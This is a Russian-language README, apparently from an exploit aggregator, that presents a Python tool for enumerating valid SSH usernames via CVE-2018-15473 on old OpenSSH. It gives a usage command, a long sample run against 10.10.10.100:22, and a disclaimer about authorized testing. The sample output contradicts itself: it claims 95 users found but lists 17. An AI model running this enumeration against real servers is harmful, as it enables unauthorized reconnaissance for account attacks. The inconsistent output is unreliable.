## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-BDALRHMNHAMDALALM-JPG-CVE-2018-15473-USER-ENUMERATION-
# CVE-2018-15473 – Перечисление имён пользователей SSH
Python-инструмент, разработанный мной для определения действительных имён пользователей SSH путём эксплуатации **CVE-2018-15473**.
## Информация о цели
* **Сервис:** SSH
* **Версия:** OpenSSH 5.8p1 Debian 1ubuntu3
* **Операционная система:** Ubuntu Linux
* **Протокол:** SSH-2.0
* **Оценка:** Протестировано на CVE-2018-15473 (Перечисление имён пользователей SSH)
* * *
## Язык
* Python 3
* * *
## Возможности
* Разработан на Python 3.
* Перечисляет действительные имена пользователей SSH, используя CVE-2018-15473.
* Поддерживает пользовательские списки имён пользователей (wordlist).
* Отображает обнаруженные имена пользователей в реальном времени.
* Выводит сводку всех действительных имён пользователей по завершении сканирования.
* Лёгкий и простой в использовании.
* * *
## Использование
root@kitploit:~
python3 enum_ssh.py usernames.txt
Где `usernames.txt` содержит список имён пользователей для проверки.
* * *
## Пример вывода
root@kitploit:~
[parrot@parrot]-[~]
$ python3 enum_ssh.py usernames.txt
[*] Starting CVE-2018-15473 enumeration against 10.10.10.100:22
[*] Using wordlist: usernames.txt
[+] [EXISTS] -> root
[+] [EXISTS] -> admin
[+] [EXISTS] -> administrator
[+] [EXISTS] -> user
[+] [EXISTS] -> test
[+] [EXISTS] -> guest
[+] [EXISTS] -> demo
[+] [EXISTS] -> operator
[+] [EXISTS] -> sysadmin
[+] [EXISTS] -> security
[+] [EXISTS] -> netadmin
[+] [EXISTS] -> webmaster
[+] [EXISTS] -> support
[+] [EXISTS] -> service
[+] [EXISTS] -> ubuntu
[+] [EXISTS] -> debian
[+] [EXISTS] -> centos
[+] [EXISTS] -> fedora
[+] [EXISTS] -> kali
[+] [EXISTS] -> parrot
========================================
[*] Scan complete.
[*] Found 95 valid user(s):
- root
- admin
- administrator
- user
- test
- guest
- demo
- operator
- sysadmin
- security
- netadmin
- webmaster
- support
- service
- ubuntu
- debian
- centos
========================================
* * *
## Отказ от ответственности
Этот инструмент предназначен **только для образовательных целей** и **авторизованного тестирования безопасности**. Используйте его только на системах, на которые у вас есть явное разрешение.